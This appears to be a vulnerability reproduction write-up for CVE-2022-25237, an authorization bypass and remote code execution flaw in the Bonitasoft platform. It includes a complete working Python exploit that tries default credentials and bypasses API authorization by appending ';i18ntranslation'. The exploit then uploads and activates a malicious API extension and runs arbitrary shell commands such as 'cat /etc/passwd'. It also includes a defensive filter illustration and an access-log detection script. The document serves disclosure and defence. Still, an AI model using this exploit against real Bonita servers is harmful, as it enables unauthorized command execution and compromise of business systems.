

Bonitasoft Platform RCE Vulnerability Reproduction (CVE-2022-25237)

1. Product Overview

Bonitasoft is a business automation platform that makes it easier to build, deploy and manage automated applications inside business processes; Bonita is an open-source, extensible platform for business process automation and optimization.

2. Vulnerability Overview

In Bonitasoft versions affected by this authorization vulnerability, a configuration issue in the API authorization filter means that a crafted string appended to an API URL bypasses the authorization check. An attacker who holds only ordinary-user privileges can, after bypassing authorization, deploy malicious code to the server and achieve remote code execution.
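To make the filter flaw concrete, here is an added Python illustration; it is not Bonita's code, and the exclusion regex, the protected prefixes and the /API/system/i18ntranslation path are assumptions for the example. It contrasts a check that runs a "public resource" pattern over the raw request URI (so a matrix parameter such as `;i18ntranslation` anywhere in the URL satisfies it) with a check that normalizes the path first and then requires an exact match.

```python
import re
from urllib.parse import urlsplit

# Constructed illustration of an exclusion rule in a REST API authorization
# filter. NOT Bonita's real configuration: it merely exempts the i18n
# translation resource from authentication, as such filters commonly do.
PUBLIC_RESOURCE_PATTERN = re.compile(r"^/(bonita/)?API/.*i18ntranslation")

# Assumed exact paths of the one resource that may be served anonymously.
PUBLIC_RESOURCE_PATHS = ("/API/system/i18ntranslation",
                         "/bonita/API/system/i18ntranslation")


def is_exempt_vulnerable(request_uri: str) -> bool:
    """Flawed check: the pattern is applied to the raw URI, so appending
    ';i18ntranslation' to any protected API path makes the whole request
    look like the public translation resource."""
    return PUBLIC_RESOURCE_PATTERN.search(request_uri) is not None


def normalize_path(request_uri: str) -> str:
    """Strip the query string and matrix (';key=value') segments, drop empty
    and '.' segments and resolve '..', so the authorization check sees the
    same path the servlet container will dispatch to."""
    segments = []
    for seg in urlsplit(request_uri).path.split("/"):
        seg = seg.split(";", 1)[0]          # discard matrix parameters
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def is_exempt_fixed(request_uri: str) -> bool:
    """Hardened check: normalize first, then require an exact match on the
    public resource instead of a substring match anywhere in the URL."""
    return normalize_path(request_uri) in PUBLIC_RESOURCE_PATHS


def authorize(request_uri: str, authenticated: bool, check=is_exempt_fixed) -> bool:
    """Return True when the request may proceed to the API."""
    if check(request_uri):
        return True
    return authenticated


if __name__ == "__main__":
    # Requests shaped like the ones in the PoC on this page.
    for uri in ("/API/system/i18ntranslation?locale=en",
                "/API/pageUpload;i18ntranslation?action=add",
                "/API/portal/page/;i18ntranslation",
                "/API/extension/rce?p=0&c=1&cmd=id"):
        print(f"{uri:45s} vulnerable={is_exempt_vulnerable(uri)!s:5s} fixed={is_exempt_fixed(uri)}")
```

The design point is that the authorization decision and the dispatch decision must be made on the same canonical path; any check that matches on the raw URI, or uses a substring/regex match where an exact match was intended, is open to this class of bypass.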

3. Affected Versions

For community (Community Edition): below 2022.1-u0 (7.14.0)

For subscription (Subscription Edition): below 2022.1-u0 (7.14.0)

below 2021.2-u4 (7.13.4)

below 2021.1-0307 (7.12.11)

below 7.11.7

4. Environment Setup

Reproduced on the vulfocus online target range.

5. Exploitation Steps

1. Open the range environment and sign in on the login page with the default account and password: install/install;

2. Create an ordinary user

 

3. Use the PoC written by a third-party researcher

Project address: CVEs/CVE-2022-25237 at master · RhinoSecurityLabs/CVEs · GitHub

# ## Information
# **Description:** This vulnerability allows authorization bypass and remote code execution in Bonitasoft web.  
# **Versions Affected:** 2022.1  
# **Version Fixed:**  
# For community:
# - 2022.1-u0 (7.14.0)
# For subscription:
# - 2022.1-u0 (7.14.0)
# - 2021.2-u4 (7.13.4)
# - 2021.1-0307 (7.12.11)
# - 7.11.7  
# **Researcher:** David Yesland (https://twitter.com/daveysec)  
# **Disclosure Link:** https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/  
# **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2022-25237  

import requests
import sys


class exploit:
    try:
        session = requests.session()
        bonita_user = sys.argv[1]
        bonita_password = sys.argv[2]
        target_path = sys.argv[3]
        cmd = sys.argv[4]
        tempPath = ""
        extension_id = ""
        bonita_default_user = "install"
        bonita_default_password = "install"
        platform_default_user = "platformAdmin"
        platform_default_password = "platform"
    except:
        # The usage line lists every positional argument read above.
        print(f"Usage: python3 {sys.argv[0]} <user> <password> http://localhost:8080/bonita 'cat /etc/passwd'")
        exit()

def try_default_logins():
    req_url = f"{exploit.target_path}/loginservice"
    req_cookies = {"x": "x"}
    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req_data = {"username": exploit.bonita_default_user, "password": exploit.bonita_default_password, "_l": "en"}
    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
    if r.status_code == 401:
        return False
        # This does not seem to work when authenticating as platformAdmin, maybe it can though.
    #     req_url = f"{exploit.target_path}/platformloginservice"
    #     req_cookies = {"x": "x"}
    #     req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    #     req_data = {"username": exploit.platform_default_user, "password": exploit.platform_default_password, "_l": "en"}
    #     r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
    #     if r.status_code == 200:
    #         print(f"[+] Found default creds: {exploit.platform_default_user}:{exploit.platform_default_password}")
    #         return True
    else:
        print(f"[+] Found default creds: {exploit.bonita_default_user}:{exploit.bonita_default_password}")
        return True



def login():
    req_url = f"{exploit.target_path}/loginservice"
    req_cookies = {"x": "x"}
    req_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req_data = {"username": exploit.bonita_user, "password": exploit.bonita_password, "_l": "en"}
    r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data)
    if r.status_code == 401:
        print("[!] Could not get a valid session using those credentials.")
        exit()
    else:
        print(f"[+] Authenticated with {exploit.bonita_user}:{exploit.bonita_password}")

def upload_api_extension():
    req_url = f"{exploit.target_path}/API/pageUpload;i18ntranslation?action=add"
    files=[
    ("file",("rce_api_extension.zip",open("rce_api_extension.zip",'rb'),'application/octet-stream'))
    ]
    r = exploit.session.post(req_url, files=files)
    exploit.tempPath = r.json()["tempPath"]

def activate_api_extension():
    req_url = f"{exploit.target_path}/API/portal/page/;i18ntranslation"
    req_headers = {"Content-Type": "application/json;charset=UTF-8"}
    req_json={"contentName": "rce_api_extension.zip", "pageZip": exploit.tempPath}
    r = exploit.session.post(req_url, headers=req_headers, json=req_json)
    exploit.extension_id = r.json()["id"]

def delete_api_extension():
    req_url = f"{exploit.target_path}/API/portal/page/{exploit.extension_id};i18ntranslation"
    exploit.session.delete(req_url)

def run_cmd():
    req_url = f"{exploit.target_path}/API/extension/rce?p=0&c=1&cmd={exploit.cmd}"
    r = exploit.session.get(req_url)
    print(r.json()["out"])

if not try_default_logins():
    print("[!] Did not find default creds, trying supplied credentials.")
    login()
upload_api_extension()
activate_api_extension()
try:
    run_cmd()
except:
    delete_api_extension()
delete_api_extension()

Note: CVE-2022-25237.py and rce_api_extension.zip must be placed in the same directory.
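From the defender's side, the requests the PoC above issues leave a recognisable trail in the application server's access log. The following added example is not part of the original post or of the PoC; the Tomcat-style log lines are constructed samples and the page id 42 is invented. It flags any /API/ request carrying a `;i18ntranslation` matrix parameter and, per client address, correlates the upload, activate and extension-call sequence into a single higher-confidence finding.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed access-log sample (common log format as Tomcat's AccessLogValve
# writes it). These lines are made up for the example, not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2022:10:01:02 +0000] "POST /bonita/loginservice HTTP/1.1" 200 0
10.0.0.5 - - [10/Jun/2022:10:01:05 +0000] "GET /bonita/API/system/i18ntranslation?f=locale%3den HTTP/1.1" 200 512
10.0.0.5 - - [10/Jun/2022:10:01:09 +0000] "POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1" 200 211
10.0.0.5 - - [10/Jun/2022:10:01:10 +0000] "POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1" 200 344
10.0.0.5 - - [10/Jun/2022:10:01:12 +0000] "GET /bonita/API/extension/rce?p=0&c=1&cmd=id HTTP/1.1" 200 87
10.0.0.5 - - [10/Jun/2022:10:01:13 +0000] "DELETE /bonita/API/portal/page/42;i18ntranslation HTTP/1.1" 200 0
10.0.0.9 - - [10/Jun/2022:10:02:30 +0000] "GET /bonita/API/bpm/case?p=0&c=10 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# A matrix parameter named i18ntranslation on any /API/ path is never produced
# by the legitimate client, which requests the real resource by its path.
MATRIX_BYPASS_RE = re.compile(r"/API/[^?]*;i18ntranslation", re.IGNORECASE)


def parse_line(line: str):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["uri"].split("?", 1)[0]
    return rec


def detect(log_text: str, window_seconds: int = 300):
    """Scan access-log text and return a list of findings as
    (kind, client_ip, method, uri) tuples.

    kind is 'auth_bypass_attempt' for every matrix-parameter bypass on an
    /API/ path, and 'api_extension_rce_chain' when the same client uploads
    a page, activates it via the bypass and then calls /API/extension/
    within window_seconds."""
    findings = []
    stage = defaultdict(dict)            # client ip -> {"upload": ts, "activate": ts}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, ts = rec["ip"], rec["path"], rec["ts"]
        if MATRIX_BYPASS_RE.search(rec["uri"]):
            findings.append(("auth_bypass_attempt", ip, rec["method"], rec["uri"]))
            if "/API/pageUpload" in path and rec["method"] == "POST":
                stage[ip]["upload"] = ts
            elif "/API/portal/page" in path and rec["method"] == "POST":
                stage[ip]["activate"] = ts
        elif "/API/extension/" in path and rec["status"] == "200":
            s = stage.get(ip, {})
            if ("upload" in s and "activate" in s
                    and (ts - s["upload"]).total_seconds() <= window_seconds):
                findings.append(("api_extension_rce_chain", ip, rec["method"], rec["uri"]))
    return findings


if __name__ == "__main__":
    for kind, ip, method, uri in detect(SAMPLE_LOG):
        print(f"{kind:25s} {ip:10s} {method:6s} {uri}")
```

Either finding on its own is worth a ticket; on a patched instance the bypass attempts will return 401 rather than 200, so the status code is a quick way to tell a scan from a successful exploitation. The chain rule deliberately keys on the unauthorised activation rather than on the command string, so it is not defeated by encoding or renaming the extension's query parameters.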

6. Remediation

Update to a fixed version.

Responsible editor: 鲁达
